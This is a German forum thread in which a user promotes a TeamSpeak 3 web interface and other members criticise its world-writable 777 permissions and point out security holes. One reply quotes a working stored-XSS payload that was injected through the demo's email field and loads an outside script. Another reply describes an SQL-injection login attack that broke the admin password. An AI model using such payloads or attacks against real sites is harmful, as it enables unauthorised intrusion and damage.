[JS] [ALPHA] Teamspeak 3 Webinterface

[~[iCe™]]

Sehr geehrte Community,

ich möchte hier mein Studienprojekt vorstellen. In diesem Porjekt wurde ein eigenständiges Teamspeak 3 Webinterface entwickelt.

Das Webinterface besitzt ein komplettes Controlpanel, womit es möglich ist, Benutzer Spezifisch Rechte zu erteilen und diese selbst auf eine gewisse Zeit zu beschränken. Des Weiteren können über das Webinterface mehrere Instanzen eingepflegt werden und diese per Shell gestartet bzw. gestoppt werden (root Benutzer ist aus Sicherheitsgründen gesperrt).<br><br>

Das Webinterface befindet sich in einer Open Alpha und kann auf der oben stehenden Homepage beantragt werden. Aus Sicherheitsgründen wird eine Downloadbare version allerdings erst mit der Beta erhältlich sein. Das Webinterface benutzt PHP, SQL und Javascript. Es benutzt Bootstrap als Framework und ist so ausgelegt, dass sie wenig Mobiles Datenvolumen benötigt. D.h. die Homepage verbraucht in einer Stunde ca. 10MB Mobiles Traffic, da die nötigen Informationen per ajax nachgeladen werden.<br>


Das Webinterface besitzt viele Funktionen... Hier mal ein paar Beispiele:

Webinterface für mobilen Gebrauch ausbauen
Webinterface Benutzer können sich selbstständig registrieren
Webinterface Benutzer kann Anfrage auf Teamspeak Server stellen

Profilübersicht: Profil bearbeiten
Profilübersicht: Rechte einschauen
Globale Einstellungen: Haupteinstellungen (Sprache, Module) können geändert werden
Globale Einstellungen: Instanzen hinzufügen
Globale Einstellungen: Instanzen löschen
Globale Einstellungen: Instanzen bearbeiten
Globale Einstellungen: Benutzer hinzufügen
Globale Einstellungen: Benutzer löschen
Globale Einstellungen: Benutzer bearbeiten
Globale Einstellungen: Benutzer bearbeiten [Server bearbeiten mehr Spezifizieren]
TS3 Webinterface: Instanznachrichten
TS3 Webinterface: Instanzpokes
TS3 Webinterface: Server erstellen
TS3 Webinterface: Server löschen
TS3 Webinterface: Server starten bzw. Server stoppen
TS3 Webinterface: Servernachrichten
TS3 Webinterface: Serverpokes
TS3 Webinterface: Server online einsehen (Live Viewer)
TS3 Webinterface Serverview: Benutzerinformationen anschauen (Profilbild, IDs, Name...)
TS3 Webinterface Serverview: Benutzeraktionen durchführen (kicken, bannen, ...)
TS3 Webinterface Serverview: Benutzerrechte ändern (Server- bzw. Channelgruppen entfernen bzw. hinzufügen)
TS3 Webinterface Serverview: Channelinformationen anschauen (IDs, Name, ...)
TS3 Webinterface Serverview: Channelaktionen durchführen (Alle im Channel kicken, bannen, ...)
TS3 Webinterface Servermassenaktionen: Massenkicks, Massenbans, Massennachrichten, Massenpokes...
TS3 Webinterface Serverbans: Serverbans anschauen
TS3 Webinterface Serverbans: Serverbans löschen
TS3 Webinterface Server Token: Token erstellen
TS3 Webinterface Server Token: Tokenliste anschauen
TS3 Webinterface Server Token: Token löschen
TS3 Webinterface Server Icons: Hochladen
TS3 Webinterface Server Icons: löschen
TS3 Webinterface Server Icons: anschauen und herunterladen
TS3 Webinterface Backups: Channelbackups vom Teamspeakserver (momenatan nur Namen)
TS3 Webinterface: Query Log

Eine Demo des Webinterfaces ist ebenfalls unter zu finden. Der Benutzer ist "" und das Passwort lautet "Admin123". Eine Teamspeakinstanz ist leider nicht eingepflegt, da ich momentan keine freie zur Auswahl hatte.

Später soll noch ein Teamspeak Bot, sowie auch ein Teamspeak Musicbot entwickelt werden.

(Die Bilder sind ein wenig veraltet und mittlerweile gibt es schon wieder ein paar Änderungen.... Ich bitte daher um Verständnis)

Wünsche & Fragen sind hier natürlich Willkommen!​

FALSCHER BEREICH BITTE IN "web-development" VERSCHIEBEN

 Spoiler

Ich habe mit dem Projekt nichts zu tun, ich Helfe dem Projektleiter lediglich es zu verbreiten und eventuelle Spender zu finden. Spenden bitte direkt auf der Seite tätigen.

[florian0]

Quote:

Originally Posted by ~[iCe™]

Aus Sicherheitsgründen wird eine Downloadbare version allerdings erst mit der Beta erhältlich sein.

DANKE! DANKE! DANKE!

Sonst hätte ich bei dieser katastrophalen Konfigurationsanforderung einen Herzkasper bekommen.

[Devsome]

#moved
Hier ist es besser aufgehoben

[First-Coder]

Quote:

Originally Posted by florian0

DANKE! DANKE! DANKE!

Sonst hätte ich bei dieser katastrophalen Konfigurationsanforderung einen Herzkasper bekommen.

Ich werde das problem heute noch beheben, sodass wieder zugang zur demo besteht .

[florian0]

Es ging mir eigentlich nicht um den Zugang zu Demo, sondern die Tatsache, dass die Rechteanforderung der Webanwendung "777" ist ... das ist ... dumm.

[First-Coder]

Quote:

Originally Posted by florian0

Es ging mir eigentlich nicht um den Zugang zu Demo, sondern die Tatsache, dass die Rechteanforderung der Webanwendung "777" ist ... das ist ... dumm.

Naja wie man es sieht.... Es ist auf jeden fall erforderlich.

[florian0]

Wenn 777 erforderlich ist, hast du in jedem Fall einen großen Fehler gemacht. Es gibt keine Situation außer dem betriebssystemweiten TEMP-Ordner, der den dauerhaften Einsatz von 777 auch nur ansatzweise rechtfertigen würde.

[First-Coder]

Quote:

Originally Posted by florian0

Wenn 777 erforderlich ist, hast du in jedem Fall einen großen Fehler gemacht. Es gibt keine Situation außer dem betriebssystemweiten TEMP-Ordner, der den dauerhaften Einsatz von 777 auch nur ansatzweise rechtfertigen würde.

Im web ist es durchaus üblich das gewisse dateien 777 rechte benötigen. Sei versichert, dass das interface von außen gut geschützt ist.

Und ja diese liste an verzeichnissen / dateien benötigen unbedingt diese rechte

[Padrio]

Quote:

Originally Posted by First-Coder

Im web ist es durchaus üblich das gewisse dateien 777 rechte benötigen. Sei versichert, dass das interface von außen gut geschützt ist.

Und ja diese liste an verzeichnissen / dateien benötigen unbedingt diese rechte

Dann erkläre mir doch mal wieso unbedingt jeder Benutzer, jede Gruppe sowie Andere die Rechte zum Lesen, Schreiben und sogar Ausführen brauchen?


Im Netz wird oft der Glaube verbreitet man muss jeglichen Verzeichnissen (am besten noch rekursiv) 777-Rechte verteilen, jedoch ist das ein vollkommener Irrglaube. Schau dir doch mal den folgenden Artikel genauer an: Dann lernst du nicht nur wieder was dazu, sondern erhöhst somit noch deine eigene, sowie die Sicherheit deiner User.

[First-Coder]

Quote:

Originally Posted by [Machina]

Dann erkläre mir doch mal wieso unbedingt jeder Benutzer, jede Gruppe sowie Andere die Rechte zum Lesen, Schreiben und sogar Ausführen brauchen?


Im Netz wird oft der Glaube verbreitet man muss jeglichen Verzeichnissen (am besten noch rekursiv) 777-Rechte verteilen, jedoch ist das ein vollkommener Irrglaube. Schau dir doch mal den folgenden Artikel genauer an: Dann lernst du nicht nur wieder was dazu, sondern erhöhst somit noch deine eigene, sowie die Sicherheit deiner User.

Ich weiß genau was 777 rechte heißt und finde es irgendwie auch lächerlich mich rechtfertigen zu müssen. Aber bitte..

Das webinterface wird auf dem server hochgeladen, das hochladen geschieht meist nicht über den apache user, sondern über irgendein anderen. Da das interface aber in den verzeichnissen dateien bearbeitet löscht erstellt und auch ausführt muss der apache user vollen zugriff haben.

Ich hoffe die fragen haben sich nun geklärt.

[florian0]

Und wieso nutzt du dann nicht das Berechtigungssystem und legst Benutzer mit den passenden Gruppen an? Bzw. was hindert dich daran?
Im Moment kann JEDER der auch nur in IRGENDEINERWEISE Zugriff auf dein Dateisystem bekommt, beliebig Dateien verändern. Bitte sag mir, dass das sicher klingt ?!?

Ich will nicht, dass du dich rechtfertigst, ich will nur verstehen, was dich dazu treibt ein solches Sicherheitsrisiko einzugehen.

[First-Coder]

Quote:

Originally Posted by florian0

Und wieso nutzt du dann nicht das Berechtigungssystem und legst Benutzer mit den passenden Gruppen an? Bzw. was hindert dich daran?
Im Moment kann JEDER der auch nur in IRGENDEINERWEISE Zugriff auf dein Dateisystem bekommt, beliebig Dateien verändern. Bitte sag mir, dass das sicher klingt ?!?

Ich will nicht, dass du dich rechtfertigst, ich will nur verstehen, was dich dazu treibt ein solches Sicherheitsrisiko einzugehen.

Dir ist schon klar, das es sich um ein cms system handelt, das auf php und javascript basiert?

Wie abschreckend wäre es denn bitte wenn bei der installation shell benutzer abgefragt werden würden und shell befehle ausgeführt werden.

Und naja wenn jemand unbefugtes shellzugang zum dateisystem bekommt ist das schlecht. Allerdings kannst du mir glauben, das dann meist eh schon der kampf verloren ist.

Mein tipp daher... Lass niemand unbefugten einen shellzugang haben

[florian0]

Ich sprach nicht von Shellzugang. Auch PHP kann Dateien schreiben. Was ist mit anderen "Usern" auf deinem Server? Keine anderen Webseiten geplant? Kein Phpmyadmin? Kein Plesk/Winmin/Whatever?

Das sind alles potentielle Lücken. Vielleicht fehlt dem Angreifer ja nur noch der passende Zugriff. Und damit lieferst du jedem Angreifer der irgendwo egal wie rein kommt eine persistente, vielleicht sogar cron-gesteuerte Code-Execution. Glaubst du wirklich, du bist so gut, das du alle Lücken kennst?
Warum ein Risiko eingehen, wenn du es doch ordentlich lösen konntest, anstatt einfach zu pfuschen?

[0xFADED]

Du solltest deine Form-Validation echt nochmal überarbeiten.
Das alles nur im JavaScript zu machen eröffnet so einiges an Möglichkeiten für Angreifer.

Konnte meine email Adresse problemlos zu dem hier ändern:

Code:

"><script src="//hi.kickassapp.com/kickass.js"></script>@aol.de

Aber hey: Wenigstens kann ich jetzt bei dir Space Invaders spielen

[Shadow992]

Quote:

Originally Posted by 0xFADED

Du solltest deine Form-Validation echt nochmal überarbeiten.
Das alles nur im JavaScript zu machen eröffnet so einiges an Möglichkeiten für Angreifer.

Konnte meine email Adresse problemlos zu dem hier ändern:

Code:

"><script src="//hi.kickassapp.com/kickass.js"></script>@aol.de

Aber hey: Wenigstens kann ich jetzt bei dir Space Invaders spielen

Außerdem möchte ich noch vier weitere Punkte hinzufügen:

1. Auf deiner Seite kann man aus mir unerklärlichen Gründen *hust*, folgendes Szenario sehen:


2. Komischerweise ist mir beim LogIn-Versuch das Passwort vom Administrator account kaputt gegangen... Ich konnte ja nicht wissen, dass SQL-Statements als LogIn nicht erlaubt sind... Sorry...

3. Deine aktuelle Seite weist so viele Sicherheitslücken auf... Ich bin mir sicher, wenn man noch etwas mehr Zeit investieren würde, würde man auch eine Möglichkeit finden "RM / -R" aufzurufen, vor allem weil du jeder Datei und jedem Ordner 777-Rechte gegeben hast. Ich bin aber zu faul gewesen, um mir das genauer anzuschauen, wenn du aber weiterhin behauptest, dass "777-Rechte" nicht gefährlich sind, mach ich mir auch die Mühe für dich.

4. Der beste Schutz den deine Software momentan hat, ist dein schlechtes Englisch. Du hast also ganz gute Chancen, dass 90% der Besucher Augenkrebs bekommen und deswegen gar nicht nach Sicherheitslücken suchen können. Ich bin zum Glück schon abgehärtet was das angeht.

Und jetzt nehm dir bitte die Vorschläge hier zu Herzen. Wir sind ein Hacking/Botting/Cracking-Forum, hier laufen einige Leute rum, die echt Ahnung haben wovon sie reden und wenn man hier von 3 verschiedenen Usern hört, dass XYZ scheiße ist, ohne Gegenposts, dann ist das auch in 99% der Fälle so!